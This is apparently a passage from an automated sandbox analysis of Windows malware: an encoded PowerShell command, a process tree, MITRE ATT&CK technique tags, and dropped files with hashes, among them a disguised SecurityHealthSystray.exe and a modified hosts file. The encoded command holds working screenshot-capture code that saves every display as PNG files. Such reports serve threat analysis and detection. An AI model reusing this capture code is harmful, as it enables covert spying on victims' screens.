A7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of WriteProcessMemory
PID:4140

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tlccwura\tlccwura.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3096

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E8B.tmp" "c:\Users\Admin\AppData\Local\Temp\tlccwura\CSC9F201E59D7C14595A69CC28483A571F.TMP"
4⤵
PID:2916

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5E8B.tmp
Filesize
1KB

MD5
d03f0c07fe2f8fef11b6102bc7442c8b

SHA1
3cbfd43ac11b63a902782a3d6e4fea8e736676d0

SHA256
198f08d6f4beff2468ede991dedfbf072eb15b8540b9c1ff58b63c0c1ea349b7

SHA512
0e8e7c4b9caf60a41b41b54ee8abfc07bc8c09eeccfd34c4df8959899f768a589bbe17e453a510ddc7ab350a8250d9ed4c8982bfd11fe39d10c797c2e1db1f73

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2qdljzqa.0ry.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rCwVKXl4Vb\Display (1).png
Filesize
424KB

MD5
77f98264b6f33a510c02aa5555faa754

SHA1
f462edfdb9db5686bab7b97483ada840a52fa61a

SHA256
b76d9dc3f0a58f2747935cca4f542c6bd4a4a3d842f581c8c641dd6df2bfa78e

SHA512
501398e0a1832886a9d6c3fc5db8d343beb0a20eb57efde581af27e02b001131cf720702fdfdda09dc91c1621b709c7bb5abfed91b001fefed444a972b71762b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tlccwura\tlccwura.dll
Filesize
4KB

MD5
98c07e971eb6b7f94e63ccbc039c2e4a

SHA1
e603c9424367488a429310fb5194ac31b05b57ae

SHA256
b90476272bf1c34581a9aed7a110cca5e2aae0a31e8996fe443e3a971e70bba9

SHA512
9a4ed1ad53b9baa1fba9966df66bd8d0887a88ff82c9f435b0c129591023b8e335945bb0e6d0b552e5d0be3125e635111432d2edbb6aec5f2731f81a3adb4a4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Filesize
9.5MB

MD5
a3f779e15e40e6ceafb62093600431da

SHA1
b6e8a2114ae00e16f976859679a67c576beeaad1

SHA256
2e24c77c1e27a77e8312a9961b0dffb937decf175cf71e077fc2f4b31cec7e7f

SHA512
60463509850ecffdd941b24f98d19b74db976632bbf9ff07dbe0e00d528a10589ee978ad3cf395edeaf7efcd834568cfeff1dfc42d32c29b4871d7c1e84243fc

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tlccwura\CSC9F201E59D7C14595A69CC28483A571F.TMP
Filesize
652B

MD5
3cf928ea0022d894c76cae0b6e168447

SHA1
aeb6af58a96cf58f2c9b008775cf637fc9bb8aba

SHA256
6904e4b1edf89a83ea4534fdc357b5abf0b33a585c6f6cd9201e35670c527778

SHA512
b052787e0404d62f3a12840c553499497e84d1469db2d68cd0b0953999152a732bf7d1cdcba1923eceb662f1006c862da631c6cd54d3b8a59865d97fe65fb550

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tlccwura\tlccwura.0.cs
Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tlccwura\tlccwura.cmdline
Filesize
607B

MD5
e73289801aad628478e17edd91eac27e

SHA1
dc21dbd76f380747b560007f367b0c14984b43be

SHA256
94b9fdd6049566b03166104ff2370b9f3891a037a9d1ce0fa2166d8479cd8690

SHA512
6bad34e9ac9a0dfe4f7b9282b7c625c545dfc0e041c6a3e285cf56c675818784a5ca604f380215ead07f2581b1177d12a73cd8f57d2d9bd47f157c2bd19dd9d1

Download Submit
memory/3600-4-0x00000276DE990000-0x00000276DE9B2000-memory.dmp

Filesize
136KB

Download
memory/4140-59-0x000001B799F00000-0x000001B799F08000-memory.dmp

Filesize
32KB

Download